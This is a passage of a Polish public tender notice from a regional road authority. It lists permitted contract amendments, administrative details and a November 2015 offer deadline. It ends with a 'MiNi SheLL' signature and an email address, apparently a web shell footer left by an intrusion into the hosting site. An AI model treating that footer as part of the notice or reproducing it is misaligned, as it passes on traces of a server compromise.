nie wskaże w ofercie, iż zamierza powierzyć część robót podwykonawcom, 
ich wprowadzenie na etapie wykonywania umowy jest niedopuszczalne. 
2.2.  	Zmiana osób odpowiedzialnych za kontakty i nadzór nad przedmiotem umowy, których nie można było przewidzieć w chwili sporządzenia niniejszej specyfikacji 
i w chwili zawarcia umowy, a których zmiana ma bezpośredni wpływ 
na wykonanie umowy np. gdyby wskutek wydarzeń losowych osoby wskazane 
w umowie nie mogły pełnić swoich czynności w okresie obowiązywania umowy;
W przypadku osób sprawujących nadzór nad realizacją umowy ze strony Wykonawcy zmiana którejkolwiek z osób musi być uzasadniona przez Wykonawcę na piśmie i zaakceptowana pisemnie przez Zamawiającego. Zamawiający zaakceptuje zmianę  wyłącznie wtedy, gdy kwalifikacje i doświadczenie wskazanych osób będą takie same lub wyższe od kwalifikacji i doświadczenia osób wskazanych w ofercie Wykonawcy, a dokonana zmiana nie spowoduje wydłużenia terminu wykonania przedmiotu umowy.
2.3.   Zmiana terminu realizacji zamówienia w przypadku;
a) warunki atmosferyczne odbiegające od typowych (np. silne, porywiste wiatry, długotrwałe, obfite opady, silne mrozy - poniżej 20oC i inne nietypowe warunki atmosferyczne), uniemożliwiające wykonanie przedmiotu zamówienia zgodnie 
z SIWZ;
b) zlecenie przez Zamawiającego prac dodatkowych jeżeli termin ich zlecenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy, a których konieczności zlecenia Zamawiający nie mógł przewidzieć w chwili sporządzenia niniejszej specyfikacji i w chwili zawarcia umowy;
c) 	prace objęte umową, zostały wstrzymane przez właściwy organ, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;
2.4. 	Zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych             w treści umowy.
2.5.	Zmiany wynagrodzenia w przypadku:
       	a) zmiany obowiązującej stawki podatku od towarów i usług (VAT);
2.6.	Zmiany uzasadnione okolicznościami, o których mowa w art. 357 1 Kodeks cywilny  - Jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażąco stratą, czego strony nie przewidziały przy zawarciu umowy, 
sąd może po rozważeniu interesów stron, zgodnie z zasadami współżycia społecznego, oznaczać sposób wykonania zobowiązania, wysokość świadczenia lub nawet orzec o rozwiązaniu umowy.
3. 	Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdw-bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon Dróg Wojewódzkich w Żołędowie,
ul. Pałacowa 15, 86-031 Osielsko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2015 godzina 09:45, miejsce: Rejon Dróg Wojewódzkich w Żołędowie,
ul. Pałacowa 15, 86-031 Osielsko, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com